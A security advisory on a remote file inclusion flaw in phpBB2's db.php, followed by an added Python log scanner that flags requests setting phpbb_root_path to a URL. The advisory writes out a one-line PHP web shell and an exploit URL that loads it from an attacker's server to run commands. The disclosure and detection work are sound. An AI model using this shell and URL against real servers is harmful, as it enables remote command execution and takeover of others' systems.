The phpbb_root_path variable accepts scripts from external servers, which makes phpBB2 vulnerable to remote command execution through a custom script written by the attacker.
Credit:
This vulnerability was found by pokley and nullbyte.
Vulnerable systems:
phpBB2 version 2.0 RC-3 and below
phpBB2 CVS version pre-18th March 2002
Immune systems:
phpBB2 2.0 RC-4
phpBB2 CVS version post-18th March
The "phpBB2 root path" variable accepts input from other web sites, which enables remote attackers to execute arbitrary commands.
The vulnerability lies in the fact that db.php accepts the following input:
'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
where full_path_to_script can be a full URL from another web server.
For example, create a directory called 'db' on your web server. In this db directory, create a file called 'mysql.txt', 'mysql4.txt' or 'postgres.txt' (other file names don't seem to work).
This mysql.txt should contain this line:
<? echo "<pre>"; system($cmd); ?>
The next step is to type in the following URL in your browser:
http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
You should get the output of uname from example.com.
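One way to look for this request pattern in web server access logs, as an added example that is not part of the original advisory or of phpBB: the log lines are constructed samples in combined log format, and the function names and severity labels are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Mar/2002:10:01:02 +0000] "GET /phpBB2/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [20/Mar/2002:10:01:09 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a HTTP/1.0" 200 310',
    '192.0.2.44 - - [20/Mar/2002:10:02:30 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=hTTp%3A%2F%2Fyour_http_server%2F&dbms=mysql4&phpEx=txt HTTP/1.0" 200 12',
    '192.0.2.50 - - [20/Mar/2002:10:03:00 +0000] "GET /phpBB2/viewtopic.php?t=12 HTTP/1.0" 200 8841',
    '192.0.2.51 - - [20/Mar/2002:10:04:00 +0000] "GET /phpBB2/includes/db.php?dbms=mysql&phpEx=php HTTP/1.0" 200 0',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
# Variables the advisory's URL shows being set from the query string.
INTERNAL_VARS = ("phpbb_root_path", "dbms", "phpEx")

def classify(line):
    """Return (client, severity, reason) for a suspicious line, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, target = m.groups()
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    root_values = params.get("phpbb_root_path", [])
    if any(SCHEME_RE.match(v.strip()) for v in root_values):
        return (client, "high", "phpbb_root_path points at a URL")
    if root_values:
        return (client, "medium", "phpbb_root_path supplied by client")
    if parts.path.lower().endswith("/includes/db.php"):
        overridden = [v for v in INTERNAL_VARS if v in params]
        if overridden:
            return (client, "medium", "direct db.php request sets " + ",".join(overridden))
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones, in input order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for client, severity, reason in scan(SAMPLE_LOG):
        print(f"{severity:6} {client:15} {reason}")
```

Only query strings recorded in the access log are inspected; values sent in a POST body or a cookie do not appear there.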